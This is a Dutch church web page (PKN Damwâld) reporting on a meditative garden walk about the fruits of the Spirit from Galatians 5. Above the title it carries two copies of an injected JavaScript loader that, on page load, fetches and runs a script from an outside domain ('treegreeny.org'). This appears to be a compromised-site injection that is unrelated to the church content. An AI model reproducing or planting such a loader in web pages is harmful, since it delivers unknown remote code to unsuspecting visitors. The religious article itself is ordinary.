;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Inspirerende meditatieve tuinwandeling ... een groot genoegen! - PKN Damwâld

Inspirerende meditatieve tuinwandeling … een groot genoegen!

Gepubliceerd op: maandag 26 juni

De meditatieve tuinwandeling door ‘Het kleine Paradijs’, de schitterende tuin van Annie en Fokke Venema in Damwâld, bleek een groot genoegen te zijn. De tuin stond twee dagen lang in het teken van ‘De vruchten van de Geest’. In het decor van Gods prachtige schepping konden mooie voorwerpen (symbolen) worden bewonderd met daarbij inspirerende teksten over de vruchten van de Geest. Veel mensen maakten gebruik van de gelegenheid om deze tuinwandeling mee te beleven. De meditatieve tuinwandeling werd opgezet door het wijkavondenteam (Annie, Froukje en Sjoukje) en werd met behulp van een aantal gemeenteleden uit beide PKN-kerken in Damwâld uitgewerkt tot een inspirerende uitbeelding van het volmaakte visioen wat ons in de Bijbel wordt beschreven.

De vruchten van de Geest kwamen tijdens de tuinwandeling een voor een langs. Je werd uitgenodigd om mee te gaan, als het ware rond te kijken in de tuin van je hart, om te zien wat daar al groeit en bloeit dankzij de inwerking van de Heilige Geest, maar ook om te zien wat onderhoud nodig heeft en waarbij je dan de hulp van Gods Geest mag inroepen. Een tuinwandeling met aandacht voor natuurbeleving, inspiratie, ontmoeting en verbinding, met de natuur, met elkaar, maar bovenal met God.

Een heerlijke fruitschaal zet Paulus je voor in Galaten 5, 22-23 … liefde, vreugde en vrede, geduld, vriendelijkheid en goedheid, geloof, zachtmoedigheid en zelfbeheersing. Mooie eigenschappen die je bij jezelf mag ontdekken als de Heilige Geest met jou aan het werk gaat. Eigenschappen om je eigen te maken, om in te groeien, om bij jezelf te laten ontwikkelen.

De Here God geeft je de Heilige Geest. Het enige dat we kunnen doen is ons openstellen om ons steeds meer door die Geest te laten vullen. Ruimte geven aan de Heilige Geest betekent dat je iets met je laat gebeuren en door je heen laat stromen, in plaats van zelf iets te maken of tot stand te brengen. Zo kan de Geest rustig in ons werken als we ons hart als voedingsbodem voor hem beschikbaar stellen. Dan gaan er vruchten rijpen en komt er steeds meer smaak aan al dat moois op de fruitschaal.